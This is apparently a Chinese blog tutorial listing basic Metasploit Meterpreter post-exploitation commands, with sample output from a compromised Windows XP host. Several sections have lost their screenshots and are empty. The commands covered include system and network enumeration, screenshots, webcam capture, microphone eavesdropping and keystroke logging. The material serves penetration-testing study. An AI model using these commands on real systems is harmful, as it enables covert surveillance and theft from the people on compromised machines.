内网渗透-Metasploit之——基本后渗透命令

Metasploit之——基本后渗透命令

前言

核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。

注意：Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后，在Meterpreter命令行下执行的各种命令操作。
这里给大家准备了Metasploit后渗透的基本命令，希望对大家有帮助。

1.帮助菜单

输入help或者英文?就可以打开帮主菜单，如下所示：

这里，输出的结果比较多，我只是截取了一部分信息。

2.后渗透命令

在进行渗透的时候，有时需要执行其他的任务。为了执行新的任务，需要将当前执行的Meterpreter会话切换到后台，这时就需要用到background命令。

如下：

3.机器ID和UUID命令

获取机器ID的命令：machine_id

meterpreter > machine_id
[+] Machine ID: 172edb45d23942c9e4cbe768909b4f62

获取uuid的命令：uuid

meterpreter > uuid
[+] UUID: 0535181070ecda36/x86=1/windows=1/2019-01-25T01:43:55Z

4.通信信道的操作

这些操作可以通过channel实现

这里，我们使用channel -l 命令列出了所有可用的通信信道，然后使用channel -r [channel-id]命令选择了读取数据的通信信道。信道子系统允许通过所有的逻辑信道进行读取、列举、写入操作，这些逻辑信道都是Meterpreter命令行实现的通信子信道。

5.获取用户名和进程信息

6.获取系统信息

meterpreter > sysinfo
Computer : LIUYAZHUANG
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

7.网络命令

（1）ipconfig/ifconfig：显示被渗透主机所连接的所有内部网络
（2）arp：显示所有和被渗透主机建立过连接的IP地址，这样可以获得更过关于目标邻近系统的信息
（3）netstat：显示当前所有正在使用端口以及运行在这些端口上的进程信息。

8.文件操作命令

9.桌面命令

使用enumdesktops和getdesktop可以查看被渗透主机的桌面信息，enumdesktops列出了所有可以访问的桌面，而getdesktop列出了当前桌面的相关信息，如下：

10.截图和摄像头列举

10-1.获取当前桌面的快照

使用screenshot命令

meterpreter > screenshot
Screenshot saved to: /root/iOOsMPCB.jpeg

截图的结果：

10-2.列举摄像头

webcam_list

10-3.录制实时视频

webcam_stream

10-4.拍照

webcam_snap

10-5.进行环境监听

某些时候我们可能处于监视目的需要进行环境监听，就可以使用record_mic命令。

meterpreter > record_mic
[] Starting…
[] Stopped
Audio saved to: /root/hStZovMr.wav

也可以使用record_mic命令加上-d参数制定录音的长度，这个参数单位是秒。

10-6.计算目标系统闲置时间

?idletime
meterpreter > idletime
User has been idle for: 21 mins 19 secs

10-7.监控键盘

启动监听：keyscan_start
导出记录：keyscan_dump
停止监听：keyscan_stop

总结

Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后，在Meterpreter命令行下执行的各种命令操作。大家有时间可以看一下噢，对后期内网渗透有一定的作用。